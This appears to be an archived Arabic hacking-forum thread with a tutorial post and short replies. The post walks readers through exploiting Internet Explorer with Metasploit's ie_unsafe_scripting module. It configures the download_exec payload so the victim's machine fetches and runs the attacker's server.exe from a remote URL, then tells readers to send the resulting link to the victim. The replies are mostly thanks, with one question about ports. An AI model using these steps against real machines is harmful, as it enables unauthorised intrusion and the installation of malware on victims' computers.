المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ~| استغـلآآل ثغـرآت المتصفـح بالميتـآسبلـويـت



virus-pal
02-11-2012, 12:38 PM
# الـسسـلآآم عليـكم ورحمـة الله وبركـآتـه #

صبـآح / مـسـآء الورد #

اليـوم مسسـوي لكـم درس طــآزج توهـ طـآلـع من الفـرن #

درسسنـآ اليـوم يتكلـم عـن #| اسسـتغـلآآل ثغرة متصفـح اكسبلورر بالميتاسبلويت |#

الاخترآق رآح يكـون عن طريـق بـورت [ 8080 ] #

رآح استخـدم الميتـآسبلـويـت الاصدآر [ 3.2 ] #

طيـب في البدآيـة نفتـح الـ [ Metasploit Console ] #

ا
لآن نكتـب الامـر [ use ] وبعده اسـم الثغـره [ windows/browser/ie_unsafe_scripting ] #

يعنـي يصيـر الامـر [ use windows/browser/ie_unsafe_scripting ] #

ونضغـط انتـر


طيـب الآن نبـحـث عن البـآيلـود المنـآسـب بالامـر [ show payloads ] #

رآح يـسسـتعرض لنـآ الكثيـر من البـآيلودآت نختـآر منهـآ المنـآسـب #


وانا افـضل بـآيلـود { رفـع بـآتش في جهـاز الضحيـه وتشغيـلـه } #

نكتـب الامـر [ set ] وبعده نكتـب [ PAYLOAD ] ونكتـب بعد كـذآ اسـم البـآيـلود [ windows/download_exec ] #

يعني يصيـر الامـر كـآمـل [ set PAYLOAD windows/download_exec


الآن يبي لنـآ نـشِـوف وش تحتـآج الثغـره عـششـآن نقـدر نكمـل الاستغـلآآل نكتـب الامـر [ show options ] #

يطلـب مننـآ الـ [ SRVHOST ] الـي هو الآي بي تبعـك انا رآح اكتـب الآي بي الافتـرآضـي [ 127.0.0.1 ] #

نكتـب [ set SRVHOST 127.0.0.1 ] بدل [ 127.0.0.1 ] الى الآي بي حقـك #
ويطلـب مننـآ بعـد رآبط السيـرفـر المبـآشر نكتـب [ set URL www.stie.com/server.exe ] #

بدل [ www.stie.com/server.exe ] الى رآبط سيرفرك المبـآشر #

نكتـب set URL www.stie.com/server.exe

ونضغـط انتـر
الآن بـآقـي لنـآ تطبيـق الثغـره #

نكتـب الامـر الجبـآر [ exploit ] لتطبيـق الثغـره #

ونضغـط انتـر
انسـخ الرآبط المحدد بالاخضـر واعطيـه للضحيـه #

~| بـس بـششـرط يكـون الضحيـه عنـدك بنفـس الشبكـه |~

reda9
02-11-2012, 06:08 PM
شكرا اخي لكن لدي استفسار هل الاختراق بي المتاسبلوت يتطلب فتح بورت في المودام وجدار الحماية وهل له بورت محدد

بحر وصعب مرساه
02-17-2012, 05:37 AM
مشكوووووووووووووووووووووو ووووووووووور

HaCKer011
09-29-2012, 07:49 PM
شرح جميل ومفهوم
بارك الله بك ^^

سارة الغامدي
10-01-2012, 04:29 AM
يسلمؤؤؤؤؤ ..